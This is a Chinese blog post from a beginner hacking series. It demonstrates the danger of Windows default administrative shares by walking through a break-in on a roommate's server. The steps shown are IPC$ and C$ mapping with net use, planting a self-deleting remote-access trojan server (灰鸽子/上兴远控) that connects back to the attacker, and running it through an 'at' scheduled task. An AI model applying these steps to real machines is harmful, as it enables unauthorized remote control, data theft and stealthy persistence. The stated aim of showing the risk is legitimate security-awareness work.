在上一篇文章中,小白和大家介绍了如何对计算机做安全的加固。其中小白有说到一点就是,在windows系统中实际上磁盘是默认设置了共享的,这相当的危险。攻击者可以通过一些非法的操作将他人的本地磁盘映射到自己的电脑上,比如对方的C盘。然后在对方的磁盘上进行大肆破获或者重要资料窃取。今天,小白就带着大家一探究竟,了解磁盘默认共享的设置危害性究竟有多大。
假设,小白的舍友有一台服务器,已知上面运行着windows server 2003 操作系统,ip地址是 192.168.31.133,由于疏于对操作系统做加固操作,没有关闭磁盘的共享功能。小白很想到服务器上面去一探究竟,于是,小白做了以下操作:
第一步:打开小白自己电脑上的cmd命令行窗口,输入以下命令,和服务器建立IPC$空链接
命令:net use \对方ip地址\IPC$
第二步:将对方计算机的C盘映射到小白自己的电脑上
命令:net use g: \对方IP地址\C$
可以看到小白的电脑上出现了一个远程的磁盘,这个磁盘就是对方的C盘。
第三步:安装使用灰鸽子或者上兴远控
在小白的电脑上面下载上兴远程控制软件,下载地址问度娘。
资源可能携带病毒,请勿轻易尝试
第四步:设置远控服务器辅助
具体设置如下,IP地址是小白自己电脑的地址。
第五步:将生成的服务器传入刚刚小白映射的磁盘中(对方C盘)
第六步:利用计划任务命令执行该服务端辅助程序。
1.在小白计算机的命令行界面输入以下命令查看对方计算机的时间
2.添加计划任务,计划任务的内容为:对方的计算机在16:06分的时候执行我们上传的服务端辅助程序。
命令:at \对方ip地址 时间 要执行的程序在对方计算机的路径
3.打开上兴远控控制服务端,等待对方计算机上线
对方计算机上线后,我们就可以控制他的计算机,同时做很多事情。
同时发现我们上传的辅助程序被执行后自动删除,很难被发现。
Ps:喜欢的留个赞b( ̄▽ ̄)d ~也可以关注专题:黑客师。
切记:本次文章仅为证明默认共享的危害性,请勿轻易尝试。
下一篇文章:小白客带你走进黑客世界10之WEB应用安全历史
